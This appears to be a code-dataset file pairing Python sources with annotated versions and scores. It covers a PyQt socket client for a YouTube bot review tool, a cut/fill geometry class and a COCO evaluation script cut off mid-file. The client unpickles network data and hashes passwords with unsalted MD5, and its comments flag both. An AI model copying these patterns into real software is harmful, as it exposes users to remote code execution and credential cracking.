    logged_in_as = username
    # NOTE(review): unsalted MD5 is not a safe password hash; upgrading requires
    # a matching change in the server's credential store
    payload = ("login-attempt", username, hashlib.md5(password.encode()).hexdigest())
    sendToServer(sock, payload)
def shutdown():
    """Half-close the server socket in both directions (no further send/recv)."""
    print("CLIENT shut down")
    sock.shutdown(socket.SHUT_RDWR)
def flagscript(scriptno, flagtype):
    """Ask the server to mark script `scriptno` with flag `flagtype`."""
    now = datetime.datetime.now()
    print("%s CLIENT requesting to flag script" % now)
    request = (access_key, "flag-scripts", scriptno, flagtype)
    sendToServer(sock, request)
def downloadScripts(amount):
    """Request up to *amount* scripts; the reply is parsed by serverResponseListen."""
    global recievingFromServer
    # Mark the receive in progress immediately so clientTick does not ping
    # in the middle of the (potentially large) scripts download.
    recievingFromServer = True
    print("%s CLIENT requesting scripts" % datetime.datetime.now())
    payload = (access_key, "request-scripts", amount)
    sendToServer(sock, payload)
def editScript(scriptNo):
    """Request an exclusive edit lock on script *scriptNo* from the server."""
    print("%s CLIENT requesting to edit script %s" % (datetime.datetime.now(), scriptNo))
    sendToServer(sock, (access_key, "edit-script", scriptNo))
def quitEditing(scriptNo):
    """Release the edit lock on script *scriptNo*.

    Mirrors editScript(); the server frees the script for other users.
    """
    # BUG FIX: the log line previously said "requesting to edit script"
    # (copy-pasted from editScript), making the client log misleading.
    print("%s CLIENT quitting editing of script %s" % (datetime.datetime.now(), scriptNo))
    payload = (access_key, "quit-editing", scriptNo)
    sendToServer(sock, payload)
def safeDisconnect():
    # Orderly shutdown: stop both directions, close the descriptor, then
    # terminate the process (the listener thread exits via OSError).
    print("%s CLIENT disconnecting" % (datetime.datetime.now()))
    sock.shutdown(socket.SHUT_RDWR)
    sock.close()
    exit()
def parseScripts(scripts):
    """Deserialize script rows from the server into VideoScript objects and
    refresh the scripts tree UI.

    Each row is a tuple:
        (scriptno, subreddit, title, author, ups, downs, rawscript,
         submission_id, status, editedby, comments_amount)
    Rows are processed in descending upvote order; VideoScript registers
    itself inside videoscriptcore on construction.
    """
    # Sort ascending by upvotes (index 4) then reverse; kept as two steps
    # (not sorted(reverse=True)) to preserve the original tie ordering.
    scripts = sorted(scripts, key=lambda row: row[4])
    scripts.reverse()
    for i, script in enumerate(scripts):
        (scriptno, subreddit, title, author, ups, downs, rawscript,
         subid, status, editedby, comments_amount) = script[:11]
        # Rebuild each comment thread as a tuple of CommentWrapper objects.
        # (Previously built via repeated tuple concatenation, which is
        # quadratic in thread length.)
        newscript = [
            tuple(videoscriptcore.CommentWrapper(c[0], c[1], c[2])
                  for c in commentThread)
            for commentThread in rawscript
        ]
        # NOTE(review): 'comments' is populated from column 5 ("downs") —
        # confirm against the server row schema whether that column really
        # carries the comment count.
        videoscriptcore.VideoScript(
            vidno=i, scriptno=scriptno, submission_id=subid,
            category=subreddit, title=title, author=author, upvotes=ups,
            comments=downs, videotype="standardredditformat",
            commentInformation=newscript, music_type="funny",
            status=status, editedby=editedby,
            commentsamount=comments_amount)
    loginwindowinstance.rawscriptsmenu.addRawScriptsToTree()
def sendToServer(server, payloadattachment):
    """Pickle *payloadattachment* and send it with a 10-byte length header.

    The header is the pickled payload's byte length, left-justified in 10
    ASCII characters, so the receiver knows how many bytes to expect.
    Failures are logged and swallowed (best-effort send).
    """
    global sendingToServer
    HEADERSIZE = 10
    sendingToServer = True
    try:
        payload_attach = pickle.dumps(payloadattachment)
        payload = bytes(f"{len(payload_attach):<{HEADERSIZE}}", 'utf-8') + payload_attach
        server.sendall(payload)
    except Exception:
        print("Socket Broken!")
    finally:
        # BUG FIX: previously a failed send left sendingToServer == True
        # forever, permanently suppressing clientTick keep-alive pings.
        sendingToServer = False
def serverResponseListen():
    """Background thread: read length-prefixed pickled messages and dispatch.

    Wire format: 10-byte ASCII length header followed by a pickled tuple
    whose first element names the message type.
    SECURITY: pickle.loads on network data executes arbitrary code if the
    server is untrusted.
    """
    global access_key, loginwindowinstance, login_sucess, recievingFromServer
    print("Client listen thread active")
    HEADERSIZE = 10
    while True:
        full_msg = b''
        new_msg = True
        while True:
            try:
                buf = sock.recv(2048)
            except OSError:
                # Socket was shut down (see shutdown()/safeDisconnect()).
                print("Socket Broken")
                break
            if new_msg:
                # NOTE(review): assumes the full 10-byte header arrives in
                # the first recv() of a message — TCP does not guarantee it.
                msglen = int(buf[:HEADERSIZE])
                print("%s CLIENT new message (%s)" %( datetime.datetime.now(), msglen))
                new_msg = False
            full_msg += buf
            recievingFromServer = True
            print("%s CLIENT received %s%% (%s/%s)" % (datetime.datetime.now(), round(len(full_msg) / msglen * 100, 2), str(len(full_msg) / 1000000) + "MB", str(msglen / 1000000) + "MB"))
            # NOTE(review): exact-length framing — assumes the next message
            # never coalesces into the same recv() as the end of this one.
            if len(full_msg) - HEADERSIZE == msglen:
                print("%s CLIENT received full message (%s)" % (datetime.datetime.now(), len(full_msg) - HEADERSIZE))
                incomingdata = pickle.loads(full_msg[HEADERSIZE:])
                new_msg = True
                recievingFromServer = False
                full_msg = b""
                # Dispatch on the message-type tag.
                if incomingdata[0] == "login-success":
                    login_success_arg = incomingdata[1]
                    access_key = incomingdata[2]
                    print("%s CLIENT received %s %s" % (datetime.datetime.now(), incomingdata[0], login_success_arg))
                    if loginwindowinstance is not None:
                        if login_success_arg:
                            login_sucess = True
                        else:
                            login_sucess = False
                        # Qt signal: marshals handling onto the GUI thread.
                        loginwindowinstance.login_response.emit()
                elif incomingdata[0] == "scripts-return":
                    data = incomingdata[1]
                    print("%s CLIENT received %s scripts" % (datetime.datetime.now(), len(data)))
                    parseScripts(data)
                    break
                elif incomingdata[0] == "edit-script-success":
                    edit_script_success = incomingdata[1]
                    edit_script_id = incomingdata[2]
                    if loginwindowinstance is not None:
                        if edit_script_success:
                            loginwindowinstance.rawscriptsmenu.edit_response_true.emit()
                            print("%s CLIENT edit approval for script %s" % (datetime.datetime.now(), edit_script_id))
                        else:
                            loginwindowinstance.rawscriptsmenu.edit_response_false.emit()
                            print("%s CLIENT edit denied for script %s" % (datetime.datetime.now(), edit_script_id))
                elif incomingdata[0] == "script-status-update":
                    script_no = incomingdata[1]
                    script_status = incomingdata[2]
                    script_editedby = incomingdata[3]
                    print("%s CLIENT server updated script status %s to %s. User: %s" % (datetime.datetime.now(), script_no, script_status, script_editedby))
                    videoscriptcore.updateScriptStatus(script_no, script_status, script_editedby)
                    loginwindowinstance.rawscriptsmenu.update_table.emit()
                    #loginwindowinstance.rawscriptsmenu.addRawScriptsToTree()
                elif incomingdata[0] == "script-upload-success":
                    success = incomingdata[1]
                    scriptno = incomingdata[2]
                    if success:
                        print("%s CLIENT server successfully uploaded video %s" % (
                            datetime.datetime.now(), scriptno))
                        loginwindowinstance.rawscriptsmenu.reset_editing_status.emit()
                        publishmenu.currentPublishMenu.upload_success_true.emit()
                    else:
                        print("%s CLIENT server couldn't upload video %s" % (
                            datetime.datetime.now(), scriptno))
                        publishmenu.currentPublishMenu.upload_success_false.emit()
                elif incomingdata[0] == "PONG":
                    # Reply to clientTick's keep-alive ping.
                    print("%s CLIENT recieved PONG" % (
                        datetime.datetime.now()))
print("%s CLIENT disconnected" % datetime.datetime.now()) | YouTube Bot Client/manualreview/client.py | import socket
from time import sleep
import sys
import pickle
from threading import Thread
from manualreview import rawscriptsmenu
import hashlib
from manualreview import videoscriptcore
import datetime
from manualreview import publishmenu
from manualreview import settings
from PyQt5 import QtWidgets
import configparser
from PyQt5.QtCore import *
from PyQt5 import QtGui
from PyQt5 import QtCore
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5 import uic
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Build the (host, port) address of the server from the settings file.
server_address = (settings.server_address, int(settings.server_port))
# Shared module state, mutated by the networking functions below.
access_key = None  # session token returned by the server on login
loginwindowinstance = None  # LoginWindow used to emit Qt signals
login_sucess = None  # last login result (historical misspelling kept)
logged_in_as = None  # username of the logged-in user
sendingToServer = False  # True while sendToServer() is mid-send
recievingFromServer = False  # True while a server message is streaming in
lastPing = None  # timestamp of the last keep-alive ping
class LoginWindow(QMainWindow):
    """Qt login dialog; opens the scripts menu after a successful login."""

    # Emitted from the network thread when the server answers the login
    # attempt; connected to loginResponse below.
    login_response = pyqtSignal()

    def __init__(self):
        QWidget.__init__(self)
        uic.loadUi("UI/login.ui", self)
        # Side effect: connects the module socket and starts the worker
        # threads the first time the window is created.
        connectToServer()
        self.login.clicked.connect(self.attemptLogin)
        self.login_response.connect(self.loginResponse)
        # Auto-login when credentials are present in the settings file.
        if not settings.auto_login_user == "":
            login(settings.auto_login_user, settings.auto_login_password, self)
    #admin icecream

    def attemptLogin(self):
        # Slot for the Login button: forward the typed credentials.
        username = self.username.text()
        password = self.password.text()
        login(username, password, self)

    def loginResponse(self):
        # Slot for login_response: swap this window for the scripts menu on
        # success, otherwise show the failure status.
        if login_sucess:
            self.status.setText("Status: Login Success")
            self.close()
            self.rawscriptsmenu = rawscriptsmenu.ScriptsMenu(logged_in_as)
            self.rawscriptsmenu.show()
            downloadScripts(settings.amount_scripts_download)
        else:
            self.status.setText("Status: Login Fail")
def formatVideoScript(script):
    """Package a finished VideoScript and send it as an "upload-video" request."""
    script_no = script.scriptno
    final_script = script.final_script
    videotype = script.videoType
    video_settings = script.videosettings
    music_type = script.music_type
    thumbnail = script.thumbnail
    characters_amount = script.charactersAmount
    youtube_title = script.youtube_title
    youtube_description = script.youtube_description
    youtube_tags = script.youtube_tags
    payload = (access_key, "upload-video", script_no, (final_script, videotype, video_settings, music_type, thumbnail, characters_amount, youtube_title, youtube_description, youtube_tags))
    sendToServer(sock, payload)

def connectToServer():
    """Connect the module socket and start the listener and keep-alive threads.

    Exits the process if the server refuses the connection.
    """
    print('connecting to %s port %s' % server_address)
    try:
        sock.connect(server_address)
        sock.settimeout(None)
    except ConnectionRefusedError:
        input("Could not connect to server. Press enter to continue")
        exit()
    thread = Thread(target=serverResponseListen)
    thread.start()
    thread = Thread(target=clientTick)
    thread.start()

def clientTick():
    """Keep-alive loop: ping roughly once per wall-clock minute.

    Suppressed while a send or receive is in progress on the shared socket.
    """
    global lastPing, recievingFromServer
    while True:
        sleep(1)
        if not sendingToServer and not recievingFromServer:
            if lastPing is None:
                sendToServer(sock, (access_key, "PING",))
                lastPing = datetime.datetime.now()
                print("%s CLIENT sending ping" % (datetime.datetime.now()))
            else:
                now = datetime.datetime.now()
                # NOTE(review): minute-equality misses an exact one-hour gap.
                if not lastPing.minute == now.minute:
                    sendToServer(sock, (access_key, "PING",))
                    print("%s CLIENT sending ping (%s)" % (datetime.datetime.now(), now - lastPing))
                    lastPing = now

def login(username, password, loginwindowinstancearg = None):
    """Send a login attempt; the reply is handled by serverResponseListen."""
    global loginwindowinstance, logged_in_as
    loginwindowinstance = loginwindowinstancearg
    logged_in_as = username
    # SECURITY: unsalted MD5 is a weak password hash; the server expects it.
    payload = ("login-attempt", username, hashlib.md5(password.encode()).hexdigest())
    sendToServer(sock, payload)

def shutdown():
    """Half-close the socket; the listener thread stops on the resulting OSError."""
    print("CLIENT shut down")
    sock.shutdown(socket.SHUT_RDWR)

def flagscript(scriptno, flagtype):
    """Ask the server to flag script *scriptno* with *flagtype*."""
    print("%s CLIENT requesting to flag script" % datetime.datetime.now())
    payload = (access_key, "flag-scripts", scriptno, flagtype)
    sendToServer(sock, payload)

def downloadScripts(amount):
    """Request up to *amount* scripts from the server."""
    global recievingFromServer
    # Set early so clientTick does not ping during the large download.
    recievingFromServer = True
    print("%s CLIENT requesting scripts" % datetime.datetime.now())
    payload = (access_key, "request-scripts", amount)
    sendToServer(sock, payload)

def editScript(scriptNo):
    """Request an exclusive edit lock on script *scriptNo*."""
    print("%s CLIENT requesting to edit script %s" % (datetime.datetime.now(), scriptNo))
    payload = (access_key, "edit-script", scriptNo)
    sendToServer(sock, payload)

def quitEditing(scriptNo):
    """Release the edit lock on script *scriptNo*."""
    # NOTE(review): log text says "requesting to edit" — copy-pasted from
    # editScript; the request actually sent is "quit-editing".
    print("%s CLIENT requesting to edit script %s" % (datetime.datetime.now(), scriptNo))
    payload = (access_key, "quit-editing", scriptNo)
    sendToServer(sock, payload)

def safeDisconnect():
    """Orderly shutdown: close the socket and terminate the process."""
    print("%s CLIENT disconnecting" % (datetime.datetime.now()))
    sock.shutdown(socket.SHUT_RDWR)
    sock.close()
    exit()
def parseScripts(scripts):
    """Deserialize script rows from the server into VideoScript objects and
    refresh the scripts tree UI.

    Each row: (scriptno, subreddit, title, author, ups, downs, rawscript,
    submission_id, status, editedby, comments_amount).
    """
    # Descending upvote order: sort ascending by index 4, then reverse.
    scripts = sorted(scripts, key=lambda x: x[4])
    scripts.reverse()
    for i, script in enumerate(scripts):
        scriptno = script[0]
        subreddit = script[1]
        title = script[2]
        author = script[3]
        ups = script[4]
        downs = script[5]
        rawscript = script[6]
        subid = script[7]
        status = script[8]
        editedby = script[9]
        comments_amount = script[10]
        newscript = []
        # Rebuild each comment thread as a tuple of CommentWrapper objects.
        # NOTE(review): repeated tuple concatenation is quadratic in thread
        # length.
        for x, commentThread in enumerate(rawscript):
            comment_to_append = ()
            for y, comment in enumerate(commentThread):
                comment_to_append = comment_to_append + (videoscriptcore.CommentWrapper(comment[0], comment[1], comment[2]), )
            newscript.append(comment_to_append)
        # NOTE(review): 'comments' receives column 5 ("downs") — verify the
        # server row schema.
        videoscriptcore.VideoScript(vidno=i, scriptno=scriptno, submission_id=subid, category=subreddit,
                                    title=title,
                                    author=author, upvotes=ups, comments=downs,
                                    videotype="standardredditformat",
                                    commentInformation=newscript, music_type="funny", status=status, editedby=editedby, commentsamount=comments_amount)
    loginwindowinstance.rawscriptsmenu.addRawScriptsToTree()
def sendToServer(server, payloadattachment):
    """Pickle *payloadattachment* and send it with a 10-byte length header.

    The header is the pickled payload's byte length, left-justified in 10
    ASCII characters, so the receiver knows how many bytes to expect.
    Failures are logged and swallowed (best-effort send).
    """
    global sendingToServer
    HEADERSIZE = 10
    sendingToServer = True
    try:
        payload_attach = pickle.dumps(payloadattachment)
        payload = bytes(f"{len(payload_attach):<{HEADERSIZE}}", 'utf-8') + payload_attach
        server.sendall(payload)
    except Exception:
        print("Socket Broken!")
    finally:
        # BUG FIX: previously a failed send left sendingToServer == True
        # forever, permanently suppressing clientTick keep-alive pings.
        sendingToServer = False
def serverResponseListen():
    """Background thread: read length-prefixed pickled messages and dispatch.

    Wire format: 10-byte ASCII length header followed by a pickled tuple
    whose first element names the message type.
    SECURITY: pickle.loads on network data executes arbitrary code if the
    server is untrusted.
    """
    global access_key, loginwindowinstance, login_sucess, recievingFromServer
    print("Client listen thread active")
    HEADERSIZE = 10
    while True:
        full_msg = b''
        new_msg = True
        while True:
            try:
                buf = sock.recv(2048)
            except OSError:
                # Socket was shut down (see shutdown()/safeDisconnect()).
                print("Socket Broken")
                break
            if new_msg:
                # NOTE(review): assumes the full 10-byte header arrives in
                # the first recv() of a message — TCP does not guarantee it.
                msglen = int(buf[:HEADERSIZE])
                print("%s CLIENT new message (%s)" %( datetime.datetime.now(), msglen))
                new_msg = False
            full_msg += buf
            recievingFromServer = True
            print("%s CLIENT received %s%% (%s/%s)" % (datetime.datetime.now(), round(len(full_msg) / msglen * 100, 2), str(len(full_msg) / 1000000) + "MB", str(msglen / 1000000) + "MB"))
            # NOTE(review): exact-length framing — assumes the next message
            # never coalesces into the same recv() as the end of this one.
            if len(full_msg) - HEADERSIZE == msglen:
                print("%s CLIENT received full message (%s)" % (datetime.datetime.now(), len(full_msg) - HEADERSIZE))
                incomingdata = pickle.loads(full_msg[HEADERSIZE:])
                new_msg = True
                recievingFromServer = False
                full_msg = b""
                # Dispatch on the message-type tag.
                if incomingdata[0] == "login-success":
                    login_success_arg = incomingdata[1]
                    access_key = incomingdata[2]
                    print("%s CLIENT received %s %s" % (datetime.datetime.now(), incomingdata[0], login_success_arg))
                    if loginwindowinstance is not None:
                        if login_success_arg:
                            login_sucess = True
                        else:
                            login_sucess = False
                        # Qt signal: marshals handling onto the GUI thread.
                        loginwindowinstance.login_response.emit()
                elif incomingdata[0] == "scripts-return":
                    data = incomingdata[1]
                    print("%s CLIENT received %s scripts" % (datetime.datetime.now(), len(data)))
                    parseScripts(data)
                    break
                elif incomingdata[0] == "edit-script-success":
                    edit_script_success = incomingdata[1]
                    edit_script_id = incomingdata[2]
                    if loginwindowinstance is not None:
                        if edit_script_success:
                            loginwindowinstance.rawscriptsmenu.edit_response_true.emit()
                            print("%s CLIENT edit approval for script %s" % (datetime.datetime.now(), edit_script_id))
                        else:
                            loginwindowinstance.rawscriptsmenu.edit_response_false.emit()
                            print("%s CLIENT edit denied for script %s" % (datetime.datetime.now(), edit_script_id))
                elif incomingdata[0] == "script-status-update":
                    script_no = incomingdata[1]
                    script_status = incomingdata[2]
                    script_editedby = incomingdata[3]
                    print("%s CLIENT server updated script status %s to %s. User: %s" % (datetime.datetime.now(), script_no, script_status, script_editedby))
                    videoscriptcore.updateScriptStatus(script_no, script_status, script_editedby)
                    loginwindowinstance.rawscriptsmenu.update_table.emit()
                    #loginwindowinstance.rawscriptsmenu.addRawScriptsToTree()
                elif incomingdata[0] == "script-upload-success":
                    success = incomingdata[1]
                    scriptno = incomingdata[2]
                    if success:
                        print("%s CLIENT server successfully uploaded video %s" % (
                            datetime.datetime.now(), scriptno))
                        loginwindowinstance.rawscriptsmenu.reset_editing_status.emit()
                        publishmenu.currentPublishMenu.upload_success_true.emit()
                    else:
                        print("%s CLIENT server couldn't upload video %s" % (
                            datetime.datetime.now(), scriptno))
                        publishmenu.currentPublishMenu.upload_success_false.emit()
                elif incomingdata[0] == "PONG":
                    # Reply to clientTick's keep-alive ping.
                    print("%s CLIENT recieved PONG" % (
                        datetime.datetime.now()))
print("%s CLIENT disconnected" % datetime.datetime.now()) | 0.091696 | 0.050471 |
import sys
import logging
import numpy as np
import pandas as pnd
from shapely.geometry import LineString
import orangery.ops.geometry as og
# Library-style logging: NullHandler keeps the package silent unless the
# host application configures handlers.
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
class Change:
    """An analysis of the change between two Section objects.

    Parameters
        section1 (Section) : the initial condition.
        section2 (Section) : the final condition.
        close_ends (bool) : True indicates dangles should be closed with a vertical line.
    """
    def __init__(self, section1, section2, close_ends=False):
        self.section1 = section1
        self.section2 = section2
        # NOTE(review): these instance attributes shadow the plotting
        # callables attached to the class at the bottom of the module
        # (Change.polygon_plot = ...), so instance access yields None until
        # reassigned — confirm intended.
        self.polygon_plot = None
        self.annotate_plot = None
        try:
            self.intersections, self.polygons, self.cutfill = og.difference(
                self.section1.line, self.section2.line, close_ends=close_ends)
        except Exception:
            # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit
            # are not intercepted; the error is logged and re-raised.
            logger.error('Error calculating cut and fill')
            raise

    def summarize(self):
        """Print summary cut/fill information to stdout."""
        print('\n')
        print("Length: ", self.length())
        # Positive cutfill entries are fill, negative are cut.
        print("Fill: ", self.cutfill[self.cutfill > 0].sum())
        print("Cut: ", self.cutfill[self.cutfill < 0].sum())
        print("Net: ", self.cutfill.sum())

    def length(self):
        """Return the length of overlap in two sections on which cut and
        fill was calculated.

        Result (float) : length of the cross-sectional cut and fill area
        """
        # Distance between the first and last intersection points.
        p1 = self.intersections[0]
        p2 = self.intersections[-1]
        return p1.distance(p2)

    def save(self, filename):
        """Save polygon cut-fill areas to csv file.

        Parameters
            filename (str) : file to output
        """
        line = LineString(self.intersections)
        xs, _ = zip(*list(line.coords))
        # Pair consecutive x-coordinates into (x0, x1) station intervals.
        intervals = zip(xs[0::1], xs[1::1])
        interval_df = pnd.DataFrame(list(intervals), columns=['x0', 'x1'])
        result = interval_df.join(self.cutfill)
        result.to_csv(filename, header=True)
# add plot method
# Bottom-of-module import — presumably to avoid a circular import with the
# plotting tools module; TODO confirm.
import orangery.tools.plotting as _gfx
# Change.plot = _gfx.change_plot
# Attach plotting callables to the class. NOTE(review): Change.__init__ sets
# instance attributes of the same names to None, which shadow these class
# attributes — confirm intended.
Change.polygon_plot = _gfx.polygon_plot
Change.annotate_plot = _gfx.annotate_plot | orangery/core/change.py | import sys
import logging
import numpy as np
import pandas as pnd
from shapely.geometry import LineString
import orangery.ops.geometry as og
# Library-style logging: NullHandler keeps the package silent unless the
# host application configures handlers.
logger = logging.getLogger(__name__)
logger.addHandler(logging.NullHandler())
class Change:
    """An analysis of the change between two Section objects.

    Parameters
        section1 (Section) : the initial condition.
        section2 (Section) : the final condition.
        close_ends (bool) : True indicates dangles should be closed with a vertical line.
    """
    def __init__(self, section1, section2, close_ends=False):
        self.section1 = section1
        self.section2 = section2
        # NOTE(review): these shadow the plotting callables attached to the
        # class at the bottom of the module — instance access yields None.
        self.polygon_plot = None
        self.annotate_plot = None
        try:
            self.intersections, self.polygons, self.cutfill = og.difference(self.section1.line, self.section2.line, close_ends=close_ends)
        except:
            # NOTE(review): bare except also catches KeyboardInterrupt;
            # prefer `except Exception:` (the error is re-raised anyway).
            logger.error('Error calculating cut and fill')
            raise
    def summarize(self):
        """Prints summary cut/fill information to stdout.
        """
        print('\n')
        print("Length: ", self.length())
        # Positive cutfill entries are fill, negative are cut.
        print("Fill: ", self.cutfill[self.cutfill > 0].sum())
        print("Cut: ", self.cutfill[self.cutfill < 0].sum())
        print("Net: ", self.cutfill.sum())
    def length(self):
        """Return the length of overlap in two sections on which cut and fill was calculated
        Result (float) : length of the cross-sectional cut and fill area
        """
        p1 = self.intersections[0]
        p2 = self.intersections[-1]
        result = p1.distance(p2)
        return result
    def save(self, filename):
        """Save polygon cut-fill areas to csv file
        Parameters
            filename (str) : file to output
        """
        line = LineString(self.intersections)
        xs, _ = zip(*list(line.coords))
        # Pair consecutive x-coordinates into (x0, x1) station intervals.
        intervals = zip(xs[0::1], xs[1::1])
        interval_df = pnd.DataFrame(list(intervals), columns=['x0', 'x1'])
        result = interval_df.join(self.cutfill)
        result.to_csv(filename, header=True)
# add plot method
# Bottom-of-module import — presumably to avoid a circular import with the
# plotting tools module; TODO confirm.
import orangery.tools.plotting as _gfx
# Change.plot = _gfx.change_plot
# Attach plotting callables to the class. NOTE(review): Change.__init__ sets
# instance attributes of the same names to None, which shadow these class
# attributes — confirm intended.
Change.polygon_plot = _gfx.polygon_plot
Change.annotate_plot = _gfx.annotate_plot | 0.58166 | 0.337217 |
import argparse
import logging
import pickle
import os
import sys
from pathlib import Path
import numpy as np
import _init_paths # noqa: F401
from utils.logging import setup_logging
def main():
    """Split evaluated videos into false-positive / false-negative / clean
    sequence sets and write one sequence list per category.

    Reads a pickled COCOeval, finds detections above --score-threshold with
    no groundtruth match at --iou-threshold (false positives) and
    groundtruth without a confident matched detection (false negatives),
    then writes false-positive-sequences.txt, false-negative-sequences.txt
    and no-mistake-sequences.txt under --output-dir.
    """
    # Use first line of file docstring as description if it exists.
    parser = argparse.ArgumentParser(
        description=__doc__.split('\n')[0] if __doc__ else '',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument(
        '--coco-eval-pickle',
        help=("Pickle file containing a COCOEval object; usually "
              "'detection_results.pkl', or 'segmentation_results.pkl'."),
        type=Path,
        required=True)
    parser.add_argument('--output-dir', required=True, type=Path)
    parser.add_argument('--score-threshold', type=float, default=0.7)
    parser.add_argument('--iou-threshold', type=float, default=0.5)
    args = parser.parse_args()

    # Validate with a real exception (assert is stripped under python -O).
    if not args.coco_eval_pickle.exists():
        raise FileNotFoundError(args.coco_eval_pickle)
    args.output_dir.mkdir(exist_ok=True, parents=True)
    output_log = str(args.output_dir / (Path(__file__).name + '.log'))
    setup_logging(output_log)
    logging.info('sys.argv: %s', ' '.join(sys.argv))
    logging.info('Parsed args:\n%s', vars(args))

    # SECURITY: pickle.load executes arbitrary code; only load pickles
    # produced by trusted evaluation runs.
    with open(args.coco_eval_pickle, 'rb') as f:
        coco_eval = pickle.load(f)

    # Locate the requested IoU threshold among the evaluated thresholds.
    iou_matches = np.where(
        np.isclose(
            coco_eval.params.iouThrs, args.iou_threshold, rtol=0,
            atol=1e-5))[0]
    if iou_matches.size != 1:
        raise ValueError(
            'Could not find --iou-threshold (%s) in coco eval iouThrs (%s)' %
            (args.iou_threshold, coco_eval.params.iouThrs))
    iou_index = iou_matches.item()

    images_with_unmatched_detections = set()
    images_with_missed_groundtruth = set()
    for eval_info in coco_eval.evalImgs:
        # Contains keys
        # ['image_id', 'category_id', 'aRng', 'maxDet', 'dtIds', 'gtIds',
        #  'dtMatches', 'gtMatches', 'dtScores', 'gtIgnore', 'dtIgnore']
        if eval_info is None:  # No detections, no groundtruth.
            continue
        image_id = eval_info['image_id']
        # NOTE(review): once an image has one unmatched detection, its
        # remaining per-category entries are skipped, so missed groundtruth
        # in another category of the same image goes unrecorded. Behavior
        # preserved from the original — confirm intended.
        if image_id in images_with_unmatched_detections:
            continue
        # detection_to_groundtruth[d] holds the id of the groundtruth
        # matched to detection d, or 0 if there is no match.
        detection_to_groundtruth = eval_info['dtMatches'][iou_index].tolist()
        detection_scores = eval_info['dtScores']
        # False positives: confident detections with no groundtruth match.
        for detection_score, matched_groundtruth in zip(
                detection_scores, detection_to_groundtruth):
            if (detection_score > args.score_threshold
                    and matched_groundtruth == 0):
                images_with_unmatched_detections.add(image_id)
        detection_id_to_index = {
            detection_id: index
            for index, detection_id in enumerate(eval_info['dtIds'])
        }
        # groundtruth_to_detection[g] holds the id of the detection matched
        # to groundtruth g, or 0 if there is no match.
        groundtruth_to_detection = eval_info['gtMatches'][iou_index].tolist()
        # False negatives: groundtruth with no confident matched detection.
        for detection_match in groundtruth_to_detection:
            assert detection_match.is_integer()
            if detection_match != 0:
                detection_score = detection_scores[
                    detection_id_to_index[int(detection_match)]]
            if (detection_match == 0
                    or detection_score < args.score_threshold):
                images_with_missed_groundtruth.add(image_id)

    def sequences_of(image_ids):
        # A sequence name is the parent directory of the image's file_name.
        return set(
            Path(coco_eval.cocoGt.imgs[image_id]['file_name']).parent.name
            for image_id in image_ids)

    sequences_with_unmatched_detections = sequences_of(
        images_with_unmatched_detections)
    sequences_with_missed_groundtruth = sequences_of(
        images_with_missed_groundtruth)
    # BUG FIX: previously this subtracted the *sequence-name* sets from the
    # set of image ids, which removed essentially nothing; subtract the
    # per-image mistake sets instead.
    images_with_no_mistakes = (
        set(coco_eval.cocoGt.imgs.keys()) - images_with_unmatched_detections
        - images_with_missed_groundtruth)
    all_sequences = sequences_of(coco_eval.cocoGt.imgs.keys())
    sequences_with_no_mistakes = (
        all_sequences - sequences_with_missed_groundtruth -
        sequences_with_unmatched_detections)

    def report(label, filename, images, sequences):
        # Log image/sequence counts and write the sorted sequence list.
        sequences = sorted(sequences)
        logging.info('Num images with %s: %s', label, len(images))
        logging.info('Num sequences with %s: %s', label, len(sequences))
        logging.info('Sequences with %s: %s', label, ', '.join(sequences))
        with open(args.output_dir / filename, 'w') as f:
            f.write('\n'.join(sequences))

    report('unmatched detections', 'false-positive-sequences.txt',
           images_with_unmatched_detections,
           sequences_with_unmatched_detections)
    report('missed groundtruth', 'false-negative-sequences.txt',
           images_with_missed_groundtruth, sequences_with_missed_groundtruth)
    report('no mistakes', 'no-mistake-sequences.txt',
           images_with_no_mistakes, sequences_with_no_mistakes)
if __name__ == "__main__":
main() | tools/one_off/list_video_mistake_types.py | import argparse
import logging
import pickle
import os
import sys
from pathlib import Path
import numpy as np
import _init_paths # noqa: F401
from utils.logging import setup_logging
def main():
    """Split evaluated videos into false-positive / false-negative / clean
    sequence sets and write one sequence list per category.

    Reads a pickled COCOeval, finds detections above --score-threshold with
    no groundtruth match at --iou-threshold (false positives) and
    groundtruth without a confident matched detection (false negatives),
    then writes false-positive-sequences.txt, false-negative-sequences.txt
    and no-mistake-sequences.txt under --output-dir.
    """
    # Use first line of file docstring as description if it exists.
    parser = argparse.ArgumentParser(
        description=__doc__.split('\n')[0] if __doc__ else '',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument(
        '--coco-eval-pickle',
        help=("Pickle file containing a COCOEval object; usually "
              "'detection_results.pkl', or 'segmentation_results.pkl'."),
        type=Path,
        required=True)
    parser.add_argument('--output-dir', required=True, type=Path)
    parser.add_argument('--score-threshold', type=float, default=0.7)
    parser.add_argument('--iou-threshold', type=float, default=0.5)
    args = parser.parse_args()

    # Validate with a real exception (assert is stripped under python -O).
    if not args.coco_eval_pickle.exists():
        raise FileNotFoundError(args.coco_eval_pickle)
    args.output_dir.mkdir(exist_ok=True, parents=True)
    output_log = str(args.output_dir / (Path(__file__).name + '.log'))
    setup_logging(output_log)
    logging.info('sys.argv: %s', ' '.join(sys.argv))
    logging.info('Parsed args:\n%s', vars(args))

    # SECURITY: pickle.load executes arbitrary code; only load pickles
    # produced by trusted evaluation runs.
    with open(args.coco_eval_pickle, 'rb') as f:
        coco_eval = pickle.load(f)

    # Locate the requested IoU threshold among the evaluated thresholds.
    iou_matches = np.where(
        np.isclose(
            coco_eval.params.iouThrs, args.iou_threshold, rtol=0,
            atol=1e-5))[0]
    if iou_matches.size != 1:
        raise ValueError(
            'Could not find --iou-threshold (%s) in coco eval iouThrs (%s)' %
            (args.iou_threshold, coco_eval.params.iouThrs))
    iou_index = iou_matches.item()

    images_with_unmatched_detections = set()
    images_with_missed_groundtruth = set()
    for eval_info in coco_eval.evalImgs:
        # Contains keys
        # ['image_id', 'category_id', 'aRng', 'maxDet', 'dtIds', 'gtIds',
        #  'dtMatches', 'gtMatches', 'dtScores', 'gtIgnore', 'dtIgnore']
        if eval_info is None:  # No detections, no groundtruth.
            continue
        image_id = eval_info['image_id']
        # NOTE(review): once an image has one unmatched detection, its
